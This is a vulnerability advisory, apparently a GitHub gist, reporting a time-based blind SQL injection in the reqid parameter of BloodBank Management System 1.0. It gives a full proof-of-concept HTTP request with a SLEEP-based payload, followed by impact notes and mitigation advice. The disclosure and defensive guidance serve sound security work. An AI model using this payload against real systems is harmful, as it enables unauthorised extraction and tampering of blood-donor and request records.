Skip to content

Instantly share code, notes, and snippets.

@higordiego
Created October 25, 2024 19:43
Show Gist options
  • Save higordiego/2aba05ef2277d85ea4148dc42189eae0 to your computer and use it in GitHub Desktop.
Save higordiego/2aba05ef2277d85ea4148dc42189eae0 to your computer and use it in GitHub Desktop.

Affected Version:

  • BloodBank Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection (Time-Based Blind)
  • Severity: HIGH
  • Status: Unpatched

Vulnerable Endpoint:

  • /file/accept.php?reqid=3

Vulnerability Description:

A SQL Injection vulnerability has been identified in the BloodBank Management System version 1.0, specifically within the reject request functionality. This flaw occurs due to insufficient input validation on the reqid parameter, allowing an attacker to inject malicious SQL code into the query responsible for processing request rejections.

This issue can be exploited through a time-based blind SQL injection, where the injected code forces the system to sleep for a specified amount of time. Although no data is directly exposed, attackers can infer whether the query succeeded by measuring the delay in the system’s response. Exploiting this vulnerability could allow the following malicious actions:

  • Data extraction over time.
  • Tampering with request records, such as canceling or altering blood donation or request statuses.
  • Denial of Service (DoS) attacks, impacting system availability by artificially increasing query times.

Proof of Concept (PoC):

Below is an example of a GET request showcasing the time-based blind SQL injection vulnerability. This query injects SQL code to pause the system for 5 seconds if executed successfully:

GET /file/accept.php?reqid=3'%20AND%20(SELECT%206479%20FROM%20(SELECT(SLEEP(5)))RvgZ)--%20MSPb HTTP/1.1
Host: localhost:8080
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/bloodrequest.php?msg=hospital1%20have%20logged%20in.
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive

In this example, if the query executes successfully, the response from the server will be delayed by 5 seconds, confirming that the system is vulnerable to SQL injection.


Image

  • Image one

  • Image two

Impact:

  • Data Breach: Attackers can gradually extract sensitive records, such as blood requests or donor data.
  • Request Manipulation: Malicious users could alter or reject blood requests, leading to system misuse or mismanagement.
  • Denial of Service (DoS): Repeated exploitation could lead to delayed responses, affecting user experience and system availability.

Mitigation Recommendations:

  1. Use Prepared Statements: Employ parameterized queries to prevent SQL injection attacks.
  2. Input Validation: Properly sanitize and validate user inputs, especially the reqid parameter, to block malicious content.
  3. Restrict Error Messages: Avoid showing detailed SQL errors to end users to minimize attack vectors.
  4. Database Privilege Management: Limit the privileges of the database user to reduce the potential impact of an exploit.
  5. Implement Rate Limiting: Limit the number of requests to prevent exploitation for DoS attacks.
  6. Routine Security Testing: Perform regular penetration tests and code reviews to identify and mitigate vulnerabilities early.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment